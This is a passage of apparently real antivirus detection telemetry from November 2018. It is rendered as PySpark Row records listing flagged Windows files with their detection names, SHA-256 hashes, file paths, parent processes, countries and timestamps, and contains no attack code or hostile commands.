  Row(detection=Row(filename='avscan-20181104-202415-8a3e111e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_690ab3e1\\AVSCAN-20181104-201541-5A869D8C\\AVSCAN-20181104-202415-8A3E111E', filesize=64000, name='TR/Spy.64000.63.#M1.#R1'), hash='ffc50b193a6366a5f551fa5365535af36ea20167a5dd6da842da49cf6b0a76e4', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:24:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204949-9f1d8692', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-204949-9F1D8692', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:49:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=23040, timestamp='2018-11-04T18:24:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='euro truck simulator 2 - going east v1.7 trainer +1 mrantifun.exe', filepath='G:\\Euro Truck Simulator 2\\Euro Truck Simulator 2 - Going East V1.7 Trainer +1 MrAntiFun.EXE', filesize=3712000, name='W32/Virut.Gen.#M1.#R1'), hash='dd83cd79bc4245f8356aa7024731f937edce0f2b1f043749e6cf3b2e3ed45185', metadata=Row(cmdline='--engine=2 --session-id=hPC\\\\\\/9e5Q6HhWBqgpbBPDMw+IAIM9N08syd34eh+R --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=13581432, timestamp='2018-11-04T17:27:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-105039-ae882502', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d689a0e7\\AVSCAN-20181104-104235-6244AAE7\\AVSCAN-20181104-105039-AE882502', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:50:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sqlite.interop.dll', filepath='D:\\BaiduNetdiskDownload\\2018新视频教程下载地址\\01图片库\\下载到电脑里再运行\\x86\\SQLite.Interop.dll', filesize=1152000, name='W32/Ramnit.CD.#M1.#R1'), hash='ec65a176f1fac723ed7cf81cc10065a9670fd466cb42fda79efb6aa5ab3d892d', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4502864, timestamp='2018-11-04T03:52:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:43:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp002520e1', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp002520e1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:38:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='46889.html', filepath='D:\\云赚打码\\cache\\businessidresultpage\\5237314121408\\46889.html', filesize=264000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='f4ea2537d8e8cdab8a4c4b50d3e1f970ff9b2373a4225ba9e08ef7837ffede06', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files\\360se6\\Application\\360se.exe', parentsize=1190472, timestamp='2018-11-01T01:26:46Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-02T06:08:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M0.#R0'), hash='6ffc5ae0946370f5b9aa1e1823ff74a726a9b95862f24f0b540e4f2043a0b18e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='listvtg.exe', filepath='C:\\OpenEdge\\proedit\\win\\listvtg.exe', filesize=512000, name='W32/Alman.BB.#M1.#R1'), hash='2e56531a2e5e0d25de97e74f15f4891921c5a0001167d53a5aaa17b8ace9b682', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\WIN9XSET\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='1a923342b602588a48c7924f5615c82ab05ce768045c44ba39942e59bb2070fe', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T00:44:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6201e234ec72e683248655e2a9a185779169d187d9e29d59c042dcfff1881af9.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\15.06.2018-121.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\6201e234ec72e683248655e2a9a185779169d187d9e29d59c042dcfff1881af9.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='6201e234ec72e683248655e2a9a185779169d187d9e29d59c042dcfff1881af9', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.03.2018-140.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T14:45:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195031-a800432a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_72dc1bd4\\AVSCAN-20181102-193726-2CE94C7E\\AVSCAN-20181102-195031-A800432A', filesize=112000, name='TR/Rootkit.gblof.#M1.#R1'), hash='048214aef2e61c56c1d0e226c964001505d6150bf763d02d1af36683ba367495', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T12:49:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\188B28FBFF3E4D12C611CD81C7D5F775A9BACFAD56E8E8765D968C7CE349BA3B', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='188b28fbff3e4d12c611cd81c7d5f775a9bacfad56e8e8765d968c7ce349ba3b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:29:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T23:35:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T15:13:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-11-01T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpavgio.dll\\\\\\"', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-02T01:11:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='untuk bi.pif', filepath='D:\\DOKUMENKU\\LAPOR BI\\UNTUK BI\\UNTUK BI.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2328880, timestamp='2018-11-02T16:11:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{2EE500BE-2AB5-49DB-9AE1-E1ACF7D4782D}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='359b9d05250d48c16fca570a2542ac05218be427003cec0757ab4725646fbdc9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101109-b2f47441', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101109-B2F47441', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe492_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe492 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T21:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001c65', filepath='C:\\Windows\\Temp\\tmp00000622\\tmp00001c65', filesize=17408000, name='TR/Taranis.395.#M1.#R1'), hash='1b943e6140f291152a8342edeb70df40993bf25bd0c11a24ca1eeb9620203200', metadata=Row(cmdline='\\\\\\/service', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Imen\\Imen Internet Security\\vsserv.exe', parentsize=1550296, timestamp='2018-11-02T09:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='H:\\Program Files\\Common Files\\microsoft shared\\Repostry\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='0f773ff003c6dc4956e290ab6a2ad2333aa840bd4bb2d0b62eeb6dc183870d6e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-02T03:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235403-b4608112', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0c7bd56c\\AVSCAN-20181102-235311-AFD88DC4\\AVSCAN-20181102-235403-B4608112', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:53:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='2eeb05ccca14d88828e10e9742c0e03fb984535dae47a9c357a6e5edbee4642f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T00:03:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft-windows-s..oxgames-minesweeper_31bf3856ad364e35_6.1.7600.16385_none_fe560f0352e04f48\\MineSweeper.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R5151'), hash='4334f4eaea9792a722587a97831c8b0292ffc3b9f5c0e05c6cb5f3139e08fc8e', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:37:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101848-94e103fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101848-94E103FD', filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040416-8def01f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-040416-8DEF01F9', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='022930c8f85f06da2c609e61bac2f11a5108c263d590fcb0996ffc0d8fc3ed1e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:40Z'), dt=datetime.date(2018, 11, 2)),
